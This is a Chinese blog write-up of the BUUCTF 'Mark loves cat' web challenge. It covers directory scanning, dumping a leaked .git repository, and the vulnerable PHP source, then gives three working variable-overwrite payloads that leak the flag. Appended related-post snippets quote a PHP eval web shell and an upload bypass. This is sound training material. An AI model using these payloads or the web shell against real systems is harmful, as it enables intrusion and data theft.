buuctf web mark loves cat

最新推荐文章于 2022-04-04 22:36:05 发布
最新推荐文章于 2022-04-04 22:36:05 发布
阅读量730 收藏 2
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/121949879
版权

打开场景,是一个主页,先审计源码,发现很多a链接,但都是指向本页面的死链,没啥用
扫目录,python3 dirmap.py -i http://bba5d728-52ed-427c-bf70-629b758fa581.node4.buuoj.cn:81/ -lcf
扫出来一堆.git,那么就考虑git源码泄露
githacker --url http://bba5d728-52ed-427c-bf70-629b758fa581.node4.buuoj.cn:81/.git --folder result1
查看结果,一目录,两文件,最重要的是index.php
把重要的部分截出来

<?php
include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

echo "the flag is: ".$flag;

分析一下逻辑,发现很明显最后的echo"the flag is".$flag是一定执行不到的
具体原因

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

因此不管是get还是post,你必须带一个flag参数过去
但是你一旦带了flag参数,假设是get过去的,假设?flag=aaa,就会触发

foreach($_GET as $x => $y){
    $$x = $$y;
}

flag=aaa $flag=$aaa,$flag被覆盖为空,你不管传什么,flag都会被覆盖成你自定义的变量,唯一能绕过的方法就是flag=flag或者flag=aaa&aaa=flag
但是带过去的flag参数不能是flag因为
if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}
即$flag=$flag就别想了,
那么flag=aaa&aaa=flag呢,也过不去,因为
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}
即flag参数的值不能是其他请求参数,防止你通过中间变量构造$flag=$flag
真坏啊!!!!!!!!!
那么靠get这条路去echo "the flag is: ".$flag;就堵死了
下面来讨论post带flag参数过去
其实是同样的道理,我敢保证这题的作者绝对是逻辑怪
foreach($_POST as $x => $y){
    $$x = $y;
}
flag=aaa,$flag=aaa,好嘛,这更直接,直接给flag赋值了
到这就讨论完了为什么最后的echo肯定执行不了了,但是观察页面源码的时候我们发现他的exit()也是会回东西给我们的

好了,这就是本题的绕过点
基本思路:

$handsome=$flag
$is=$flag
$yds=$flag

这三条必须出现一条不过分吧
神奇的payload1:yds=flag

过第一层:$yds=$flag
在这里结束

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}
相当于exit($flag),查看源码,拿到flag

又神奇了的payload2:
is=flag&flag=flag

过第一层:
$is=$flag
$flag=$flag
很明显他在利用

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}
出发后也相当于exit($is)
到这思路彻底打开了,收不住了

神奇的payload3:

/?a=flag&flag=a&handsome=flag
过第一层:
$a=$flag
$flag=$a
$handsome=$flag
然后在这停顿:
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

这里是纯靠get参数来实现的,下面来讨论post为什么不行,是因为post只有赋值功能,我们要利用exit来输出的话,必须要做的一件事是 变 量 名 = 变量名= =flag,然后触发相应的条件
利用yds的话,必须有的一件事是yds=flag,post这里flag绝对不能给值,给其他值也没意义,虽然也输出flag但是是多此一举
利用is的话,$flag=flag,而且是第一步执行,想都不要想
利用handsome的话,跟第一种情况其实是一样的,所以也没意思
参考视频链接:https://www.bilibili.com/video/BV1ML4y1p7EK/

显哥无敌
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
------已搬运-------BUUCTF:[BJDCTF2020]Mark loves cat (两种解法)(变量覆盖漏洞)
Zero_Adam的博客
02-12 408
主要锻炼一下变量覆盖那些绕绕的东西。 git泄露,,这个还没好,等问问班长的 获得源码后: index.php <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($_GET as $x => $y){ $$x = $$y; } foreach($_GET as $x => $y
BUUCTF WEB [BJDCTF2020]Mark loves cat
Y1da的博客
04-28 661
BUUCTF WEB [BJDCTF2020]Mark loves cat 在源码没有发现漏洞点,使用dirsearch扫描,发现.gti泄露 使用scrabble ./scrabble http://70f9aaf8-036c-44f0-b1f1-df263f120cfa.node4.buuoj.cn:81/ 得到flag.php和index.php文件 flag.php <?php $flag = file_get_contents('/flag'); index.php &
buuctf Mark loves cat
qq_52671379的博客
03-29 967
buuctf Mark loves cat
BUUCTF-[BJDCTF2020]Mark loves cat
weixin_57938502的博客
11-20 385
用ctf-wscan扫一下 看着有点像git泄露,输入.git查看一下,发现是403拒绝访问,说明存在git泄露只不过我们没法访问 可以用lijiejie的GitHack下载一下 下载下来打开有两个文件。 flag.php内容是读取flag文件赋值给$flag变量 index.php打开在最下面有一段PHP代码 遍历传入的get参数,要求传入的参数的键为flag并且等于$x又要求$x不等于flag,满足要求就会退出脚本。(这个两个要求相互矛盾根本不可能完成)...
web buuctf [BJDCTF2020]Mark loves cat1
weixin_44214568的博客
03-30 878
考点: 1.git泄露 2.变量覆盖 1.打开靶机,先看robots.txt,并用dirsearch进行扫描 py dirsearch.py -u f190ddaf-3db0-48c2-a858-4accf0783a69.node4.buuoj.cn:81/ -e * -t 1 -x 429 (使用dirsearch时,一定要设置好线程,不然扫不出来) 扫描发现错在.git泄露 2.利用githack把git文件抓下来 python2 GitHack.py http://f190
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`,代码检查了`GET`和`POST`是否都有`...
marktext的文包
07-21
标签“marktext的文包”进一步确认了该压缩文件的内容,是针对MarkText的文本地化版本,用于在非英文环境下正常使用MarkText的界面和功能。 **压缩包子文件解析** 1. **v8_context_snapshot.bin**: 这个文件是...
MarkText.zip
08-04
MarkText是一个MIT许可的开源项目,最新的版本可以从GitHub发布页面免费下载。MarkText还在发展,它的发展离不开所有的赞助商。 特点: 实时预览(所见即所得)和一个干净和简单的界面。 支持CommonMark Spec, ...
coremark 源代码
08-23
coremark 源代码 移植后,即可测试目标MCU的coremark评分 注意:该评分与编译器版本密切相关。
markText安装包
02-19
标题“markText安装包”所指的是一款名为markText的应用程序的安装文件,它是一个广受程序员喜爱的开源笔记软件。markText的主要特点是其简洁的用户界面和强大的Markdown支持,使得编写和预览代码注释变得既简单又...
BUU刷题Day7
姜小孩的博客
03-30 1770
[BJDCTF2020]Mark loves cat [安洵杯 2019]easy_web [NCTF2019]Fake XML cookbook MD5强碰撞 XXE
BUUCTF刷题记录(4)
bmth666的博客
04-12 1348
文章目录web[ACTF2020 新生赛]Upload web [ACTF2020 新生赛]Upload 和之前极客大挑战一样的题,上传后缀为phtml即可 连上蚁剑,即可得到flag
[BJDCTF2020]Mark loves cat
Bnessy
03-24 2557
首先打开网站看到的是一个个人博客,这种常规的 类似实战题目 先扫描目录看看 路径扫描 没错这真的是我的字典,就7个路径,哈哈哈,还在收集啊 git泄露 看到了一个 .git 泄露 用了俩工具测试,无任何有用信息,工具名称在图片里:GitHack、Git_Extract 这俩工具 一个获取文件,一个获取 .git 文件, 哈哈哈,今天才发现,我是真的菜 flag.php 是存在的 ,不过只能确定 /flag 在哪里 429 Too Many Reques...
攻防世界 WEB COMMENT
qq_41696858的博客
09-04 300
三个点,git源码泄露,密码爆破,sql二次注入 点进去一个留言窗口,看了看源码,没啥 那就dirsearch扫一波,扫出来一堆git,那么就尝试GitHacker看看能不能跑出来源码 githacker --url http://111.200.241.244:49854/ --folder result3 进到result3里面发现一个write_do.php 看了看源码,明显没写完,case下面直接break 之前扫目录的时候还扫出来一个login.php,进去看看,发现用户名zhangwei,密码z
[BUUCTF] 集训第二天
Dannie01的博客
09-29 403
补题 [GXYCTF2019]BabyUpload1 正常开端一句话木马 <?php eval($_POST[cmd]);?> php文件不许上传, 尝试上传jpg 换个姿势改一下内容 <script language='php'>eval($_POST[cmd]);</script> 上传成功,记得这个路径 因为是jpg文件,无法解析php,观察是Apache server,上传.htaccess文件来将其他文件解析成PHP文件 .htaccess文件是Apa
CTF-web做题记录(狼组/BUUCTF)【一】
weixin_39664643的博客
10-16 2710
CTF-web做题记录(狼组/BUUCTF)【一】 WEB 1、ctf.wgpsec 你可能需要一部iphone 题目如下 考察点:user-agent,burp改为iphone的user-agent,发包得到flag 2、ctf.wgpsec baby php 坑:代码理解错误,淦 考察点:代码理解,根据代码本身绕过 <?php highlight_file('source.txt'); echo "<br><br>"; $flag = 'xxxxxxxx'; $ms
Mark loves cat
m0_62094846的博客
04-04 1665
扫描目录(但是我用御剑扫不出来),然后用.git下载文件 <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){    //很明显的有变量覆写漏洞 $$x = $y ; } foreach($_GET as $x => $y){    //如果传入$x=flag&$y=flag 则$flag=$flag就可以.
BUUCTF web(六)
m0_46616663的博客
11-25 2812
[BJDCTF2020]ZJCTF,不过如此 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br
[BJDCTF2020]Mark loves cat变量覆盖
sGanYu
10-18 987
首先用dirsearch扫描下目录 由于BUUCTF限制发包量,更改扫描线程 命令:python dirsearch .py -u [url] -e * -t 3 -s 0.2, 扫除/.git泄露 得到两个php文件,kali内githack扫出来但是下载失败了 flag.php <?php $flag = file_get_contents('/flag'); ?> index.php <?php include 'flag.php'; $yds = ..
int **mark
最新发布
04-09
int **mark是一个指向指针的指针,它可以用于表示一个二维数组或者一个指向指针数组的指针。具体来说,int **mark可以用于表示一个二维整数数组,其每个元素都是一个指向整数的指针。 例如,我们可以使用int **mark来表示一个2行3列的二维整数数组。可以通过以下方式进行声明和初始化: int **mark; int rows = 2; int cols = 3; // 分配内存空间 mark = new int*[rows]; for (int i = 0; i < rows; i++) { mark[i] = new int[cols]; } // 初始化数组 mark = 1; mark = 2; mark = 3; mark = 4; mark = 5; mark = 6; 在上述代码,我们首先声明了一个指向指针的指针int **mark。然后,我们使用new运算符为每一行分配内存空间,并将每个指针赋值给mark的相应元素。最后,我们可以通过mark[i][j]来访问二维数组的元素。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值